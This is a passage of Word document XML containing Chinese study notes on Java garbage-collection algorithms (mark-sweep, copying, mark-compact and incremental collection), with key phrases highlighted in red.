          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>清除（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mark-Sweep</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F55D8" w:rsidRPr="00F41A4C" w:rsidRDefault="006F55D8" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F55D8" w:rsidRPr="00F41A4C" w:rsidRDefault="00CC0AA1" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>第一阶段从引用根节点开始标记所有被引用的对象，第二阶段遍历整个堆，把未标记的对象清除。此</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法需要暂停整个应用，同时，会产生内存碎片</w:t>
      </w:r>
      <w:r w:rsidR="001B2852">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00262B43" w:rsidRPr="00F41A4C" w:rsidRDefault="00262B43" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00262B43" w:rsidRPr="00F41A4C" w:rsidRDefault="00262B43" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复制（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Copying</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437777" w:rsidRPr="00F41A4C" w:rsidRDefault="00204E09" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>此算法把内存空间划为两个相等的区域，每次只使用其中一个区域。垃圾回收时，遍历当前使用区域，把</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>正在使用中的对象复制到另外一个区域中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。次算法每次只处理正在使用中的对象，因此复制成本比较小，同时复制过去以后还能进行相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内存整理</w:t>
      </w:r>
      <w:r w:rsidR="00512F36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，不</w:t>
      </w:r>
      <w:r w:rsidR="00512F36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>碎片</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>问题。当然，此算法的缺点也是很明显的，就是需要两倍内存空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204E09" w:rsidRPr="00F41A4C" w:rsidRDefault="00204E09" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00437777" w:rsidRPr="00F41A4C" w:rsidRDefault="00437777" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>标记</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>整理（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mark-Compact</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6200" w:rsidRPr="00F41A4C" w:rsidRDefault="008D743B" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>此算法结合了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>标记</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>两个算法的优点。也是分两阶段，第一阶段从根节点开始标记所有被引用对象，第二阶段遍历整个堆，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>清除未标记对象并且把存活对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>压缩</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>到堆的其中一块，按顺序排放</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。此算法避免了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>标记</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的碎片问题，同时也避免了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法的空间问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6200" w:rsidRPr="00F41A4C" w:rsidRDefault="00BD6200" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(5)</w:t>
      </w:r>
      <w:r w:rsidR="000C7557" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>增量收集（</w:t>
      </w:r>
      <w:r w:rsidR="000C7557" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Incremental Collecting</w:t>
      </w:r>
      <w:r w:rsidR="000C7557" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F55D8" w:rsidRPr="00F41A4C" w:rsidRDefault="008D743B" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实施垃圾回收算法，即：在应用进行的同时进行垃圾回收。不知道什么原因</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的收集器没有使用这种算法的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7557" w:rsidRPr="00F41A4C" w:rsidRDefault="000C7557" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(6)</w:t>
      </w:r>
      <w:r w:rsidR="000F2376" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
